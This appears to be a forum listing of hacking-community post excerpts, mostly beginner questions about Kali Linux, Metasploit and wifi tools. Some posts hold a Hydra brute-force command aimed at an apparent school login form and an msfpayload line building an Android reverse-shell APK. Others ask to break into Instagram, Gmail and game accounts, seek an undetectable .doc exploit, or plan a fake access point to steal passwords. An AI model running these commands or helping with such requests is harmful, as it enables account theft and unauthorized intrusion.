Hi everyone! I was wondering if it was possible to hack either Windows or OSX without remote execution of an application. What I mean is that it seems that the tutorials here are about using tools like msfvenom to create an executable file that has to be sent to the victim. Is there another way to remotely hack someone's computer? Thanks.
hello recently i started to search a way to write a program that searches a website/forum and saves (downloads) webpages based on a keyword for example i would like to search entire null-byte for posts that have a keyword -for example wifi hacking- and then download any page that has that keyword. From my google search i found out about curl a user said that it can do that but i didnt managed to find a way to do it. could someone point me to the right direction to do that with curl or anyway ...
Before I begin, I would like to address that this is gray-hat hack at most, and that I do not want to do any malicious acts like a black-hat would.
I tried to get a Meterpreter reverse tcp session in WAN to my own second PC, I used my normal Gateway for the Attack Machine and an mobile W-lan hotspot with an Tablet-PC for the Target Machine.
i am new to kali linux (version 2017.1) and i have tried alot of times to update metasploit bt it never seems to happen.
Hello everybody! I'm pretty new here, so you probably won't recognize me. However, I am currently writing on a How-To about mitmproxy and after a couple of hours I realized that this article is a Forum Thread though I'm sure that I clicked at How To. I just want to make sure whether this is something usual or if I do something wrong.
I was using metasploit atutorsqli exploit when I came across an error. This has been bugging me and bugging me and I can't seem to figure this out anybody got a clue.
i am Savath , a student at bachelor degree in year 3 . this topic , i want to learn deeply .
Hi I was hoping I could also have some help with my THC Hydra code. So far my code is : hydra -l user -P /root/Documents/pass1.txt 184.108.40.206 http-post-form "/frog.cleeveschool.net:username=^USER^&password=^PASS^&Login:Incorrect username and password combination"
Hi all, I started to learn using hydra recently and tried to brute force some web base login form which i already have access to,but after running the required command of hydra which is as follows..
MinGW is a collection of windows development tools including compilers such as GCC and G++. Using both MiniGW and Wine it is possible to compile windows code thus creating a portable executable (pe) which can be later run on a victim's machine. I'm going to show you one way to install MinGW on Kali.
First of all, I read the article on how to tell if you've been hacked (I didn't NEED to read it, I beyond know) but I'm trying to contact the author OCCUPYTHEWEB; he says he obviously has email and can be contacted there but when I click on his name it just takes me back to wonderhowto.com.
Introduction to Tor Tor is a browser just like google, Firefox and any other browser except it keeps you anonymous by hiding your IP address. Tor can be used to access the the dark web, where it is known for the use of illegal activities due to its anonymity.
How can I find out if there's a backdoor in my computer or in my iphone or android?? And how do I get rid of it without formatting the computer or restoring the iphone?
hi guys. for download video from instagram without tools you only follow :
looking for silent .doc exploit FUD. Have you gotten any yet? I got someone but demand too high. Please contact me if you get so we can work together.lets deal
This is online card game and available in play store.The sever is Myanmar and it may be easy to hack but I don't know how to hack.So somebody help me to get coin 1000B and gem 500000. Please give me the link to hack or the hacked apk for this game. Thanks.
Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing, is msfpayload was removed, and replaced with msfvenom. I used to be able to just do msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk
Then that i read this: https://null-byte.wonderhowto.com/forum/kali-linux-tp-link-tl-wn722n-v2-driver-not-working-0177837/
Hey, i am trying to hack into a instagram account. If i hack into the gmail of that person, i can do it.
Hey Everyone, I'm new to the community and new to hacking in general. I'm a complete newbie trying to learn the ropes. So hero is my question, I recently decided to use Linux as my OS. I have successfully downloaded it and created a USB Drive. I'm having a bit of trouble accessing / enabling the Wifi once on Linux. Can anyone provide any answers or suggestions?
Hi, i bought a new tp-link Tl WN722N V.2 wifi dongle for wifi hacking but when typed ifconfig, there is no wlan0 interface,so i checked if the system is even detecting my usb by typing # lsusb but there was no mention of the chipset or vendor name, just some ID 2357:010c. First i typed # lsusb without the usb and the i typed it after plugging in the usb. I searched a lot of forums but none of them worked for me. Im am runing kali 2017.1 live with persistence on a usb. The Linux version is 4.9...
Hi! I want to install Ferret Sidejack in Kali, I followed this tutorial but I have a problem
Hey guyz, i recently found out that instagram accounts can be hacked by dictionary attacks(Noob here) and so i found out the scripts online and tried them. i found this python script .
I have been wondering if it is possible to make a fake ap with airbase-ng and instead of capturing packets, i would be changing them, so I would redirect a client connected to the fake ap to any website I choose. for example, someone connects to my fake ap and clicks a login button but instead of going to the real page they are sent a packet containing a fake login page that steals passwords.
Please help everyone, one of my friends facebook got hacked. That guy first sent her request from another hacked account and did social engineering on my friend , and convienced her to give her password and also convienced to make her send some of her pics( you know what i mean) she gave her account details and that guy now is send all her pic to her friends. And he also hacked her gmail account, she neve gave her gmail account details.
Hi. I followed this guide http://null-byte.wonderhowto.com/how-to/hack-like-pro-get-even-with-your-annoying-neighbor-by-bumping-them-off-their-wifi-network-undetected-0147206/
I have changed ISP and come to realize they do not offer Port Forwarding. I spoke to support staff at my ISP and was told I would need an additional router, and any other options would need to be advised by an IT-expert. Since that is beyond their knowledge. I was hoping you have a solution for me to port forward my router without having to buy another one.
is there any way to "hack" and television? not a normal one, but a smart, since it is connected to the wifi?
For those of you that know me, you know that every time I make a post in the forum sections, I usually complain about my MITM attack not working. Well guess what...I fixed it! I didn't even have to buy a wireless adapter for my virtual machine. I read forums for months, and I found one that helped me solve my problem. Apparently, arpspoofing is having trouble processing requests with the virtual mac address, so all I did was use macchanger to change my mac address to that of my host.
Hi guys, how do i use the vulnerabilities of this site? Can one of these vulnerabilities be used to hack the site? (I have permission for testing the site)
how can I stay as anonymous as humanly possible using tails what I was thinking was, 1.Buying laptop cash and the removing hard drive, mic, camera, and speakers
Everytime I type in "airmon-ng start wlan0" the following error comes up: " wlan0 is hard blocked, please flip the hardware wifi switch to on.
I have written a Java backdoor available at http://pastebin.com/2nYicFPM, If you have any questions, please comment and I will update the tutorial on the part you find difficult to understand. This is due the code being long and it just makes it easier to explain the harder parts of it only without me having to explain everything.